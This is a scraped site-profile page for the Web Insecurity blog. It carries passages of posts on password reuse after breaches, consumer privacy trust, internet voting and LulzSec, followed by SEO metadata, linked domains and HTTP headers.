passwords subsequent to the breach that s a lot of people of course it s possible that the accounts were breached and used in a way that the owner never noticed but if they re not noticing are they really being inconvenienced probably in a global sense i e spam but maybe not in a short term decision making sense of course we could assume that the alleged hack is a hoax using many of the previously hacked passwords from sony but given how easy it is to compromise web apps i m currently assuming that the hack itself is a real thing in which case that s a lot of no change it looks suspiciously like you re likely to be more inconvenienced taking the time to change your password than you would if you did nothing statistically speaking so should you change your password after a breach it depends on how much you feel like rolling the dice failing to change their breached passwords doesn t seem to have hurt that many of the yahoo voice denizens but with numbers on re used passwords hitting the news today it s possible we ll see more people trying this avenue of attack in the future still rather than assuming those 59 are foolish for keeping the same credentials it s worth considering that they might have just been savvy gamblers this time posted at 1 46 p m 0 comments labels authentication bad behaviour passwords rejecting advice wednesday march 28 2012 apparently consumers do care about privacy i often get into discussions about whether people really do care about privacy given that they give away personal information regularly when they share with friends via facebook or other services a recent report suggests that people do care at least when it comes to banking and shopping the edelman study released in february 2012 shows that consumer concerns about data privacy and security are actively diminishing their trust in organizations for instance 92 listed data security and privacy as important considerations for financial institutions but only 69 actually trusted financial institutions to adequately protect their personal information an even sharper disconnect can be seen with online retailers with 84 naming security of personal information as a priority but only 33 trusting online retailers to protect it the blog of the office of the canadian privacy commissioner from which i drew this quote sums it up in the title privacy not just good business but good for business but i have to wonder do these numbers indicate that privacy preserving businesses will be winning customers or will we simply see claims of privacy that aren t backed up by carefully constructed systems do consumers really care about privacy or do they just say they care how will consumers evaluate potentially spurious privacy claims in canada we at least have the privacy commissioner who brings issues to light and worldwide we have the electronic frontier foundation but while both organizations are astute and do their best privacy claims are something that will need to be evaluated by organizations like consumer reports that are used by consumers when making decisions about where they spend and keep their money right now by and large we only hear about the relative privacy of an organization when a breach occurs i attended a talk on internet voting yesterday and the speaker quoted an official in dc who claimed that voters like internet voting so it must be secure which is really quite a terrifying quote if you think about it the speaker joked does this mean that because my kid likes cake it must be healthy it really clearly demonstrates first that users of the system have very little understanding of its safety despite strides in the area internet voting as currently implemented is rarely secure but also that officials who roll out such systems have little understanding of the flaws of the system and are much too willing to overlook them for convenience sake if this is the case with voting it s hard to believe that business would avoid such cognitive mistakes posted at 2 12 p m 1 comments labels privacy social hacking voting wtf tuesday february 7 2012 andrew tanenbaum on security vs fun loving students some modicum of security was required to prevent fun loving students from spoofing routers by sending them false routing information andrew s tanenbaum regarding ospf in computer networks 4th ed posted at 3 30 p m 0 comments labels academia can t make an omelette without breaking some eggs humour monday september 26 2011 on the subject of privacy and pants i was proofreading a privacy paper this afternoon and came across the funniest typo i feel it is funnier if i illustrate it so that you too can see what popped into my head when i read it photo by cnewtoncom for geek points guess whose famous pants those are without clicking the link privacy breeches are much funnier than privacy breaches i m not going to be able to get dressed tomorrow without laughing at my privacy preserving pants one could argue perhaps that the function of many pants is to provide basic privacy but i leave the finding of non privacy preserving pants as an exercise to the reader and though it is a bit tempting to run a contest for the best illustration of a privacy breech breach i imagine it would get not safe for work very quickly posted at 6 32 p m 0 comments labels humour privacy friday june 24 2011 i admit i laughed lulzsec as popular as orgasms unless you ve been ignoring the news for the past few weeks you ve probably seen mention of lulzsec and if you re a security person you ve probably seen this article about why security folk secretly love lulzsec the short version is that they re the latest hacker gang and rather than profit or social justice they re just in it for the lulz they re really making the state of computer security more obvious to the layperson lulzsec is running around pummelling some of the w...
Thumbnail images (randomly selected): * Images may be subject to copyright.YELLOW status (not for everyone)website (probably) only for adults
  • Web Insecurity.net
  • Dice
  • RETWEET @josef (Experimen...
  • Old Facebook home page
  • Confessions
  • The CU-WISE women - me + ...
  • Sci-Fi Spectacular-2618

The site also has references to the 1 subdomain(s)

  webinsecurity.net  Verify


The site also has 36 references to external domain(s).

 webinsecurity.blogspot.com  Verify  netvibes.com  Verify  add.my.yahoo.com  Verify
 blogger.com  Verify  flickr.com  Verify  arstechnica.com  Verify
 dazzlepod.com  Verify  troyhunt.com  Verify  research.microsoft.com  Verify
 datasecurity.edelman.com  Verify  blog.privcom.gc.ca  Verify  eff.org  Verify
 blogger.googleusercontent.com  Verify  twitter.com  Verify  risky.biz  Verify
 urbandictionary.com  Verify  skullsecurity.org  Verify  nakedsecurity.sophos.com  Verify
 sciencedaily.com  Verify  pleaserobme.com  Verify  support.twitter.com  Verify
 usenix.org  Verify  w2spconf.com  Verify  rttnews.com  Verify
 huffingtonpost.com  Verify  gadgetwise.blogs.nytimes.com  Verify  itunes.apple.com  Verify
 bbc.co.uk  Verify  priv.gc.ca  Verify  wpmu.org  Verify
 wordpress.org  Verify  readwriteweb.com  Verify  homepages.cs.ncl.ac.uk  Verify
 techcrunch.com  Verify  twitpic.com  Verify  news.cnet.com  Verify


The site also has 14 references to other resources (not html/xhtml )

 research.microsoft.com/users/cormac/pa___.pdf  Verify  datasecurity.edelman.com/wp-content/up___.pdf  Verify  blogger.googleusercontent.com/img/b/R2___.jpg  Verify
 blogger.googleusercontent.com/img/b/R2___.jpg  Verify  blogger.googleusercontent.com/img/b/R2___.png  Verify  www.usenix.org/events/hotsec10/tech/fu___.pdf  Verify
 www.usenix.org/events/hotsec10/tech/sl___.pdf  Verify  blogger.googleusercontent.com/img/b/R2___.png  Verify  blogger.googleusercontent.com/img/b/R2___.png  Verify
 blogger.googleusercontent.com/img/b/R2___.png  Verify  blogger.googleusercontent.com/img/b/R2___.png  Verify  blogger.googleusercontent.com/img/b/R2___.png  Verify
 w2spconf.com/2010/papers/p28.pdf  Verify  homepages.cs.ncl.ac.uk/jeff.yan/msn_draft.pdf  Verify


Top 50 hastags from of all verified websites.

Supplementary Information (add-on for SEO geeks)*- See more on header.verify-www.com

Header

HTTP/1.1 302 Found
Date Fri, 15 May 2026 11:54:08 GMT
Server Apache/2
Location htt????/webinsecurity.net/
Content-Length 210
Connection close
Content-Type text/html; charset=iso-8859-1
HTTP/1.1 200 OK
Date Fri, 15 May 2026 11:54:09 GMT
Server Apache/2
Upgrade h2,h2c
Connection Upgrade, close
Vary Accept-Encoding
Content-Encoding gzip
Content-Length 33881
Content-Type text/html; charset=UTF-8

Meta Tags

title="Web Insecurity"
content="A web security blog discussing current news, research, and ideas related to safety, security and privacy on the web." name="Description"
content="text/html; charset=UTF-8" http-equiv="Content-Type"
content="blogger" name="generator"
content="htt???/webinsecurity.blogspot.com/" property="og:url"
content="Web Insecurity" property="og:title"
content="JavaScript joys and other perils of the modern web" property="og:description"
name="google-adsense-platform-account" content="ca-host-pub-1556223355139109"
name="google-adsense-platform-domain" content="blogspot.com"

Load Info

page size33881
load time (s)1.117576
redirect count1
speed download30332
server IP 192.99.37.108
* all occurrences of the string "http://" have been changed to "htt???/"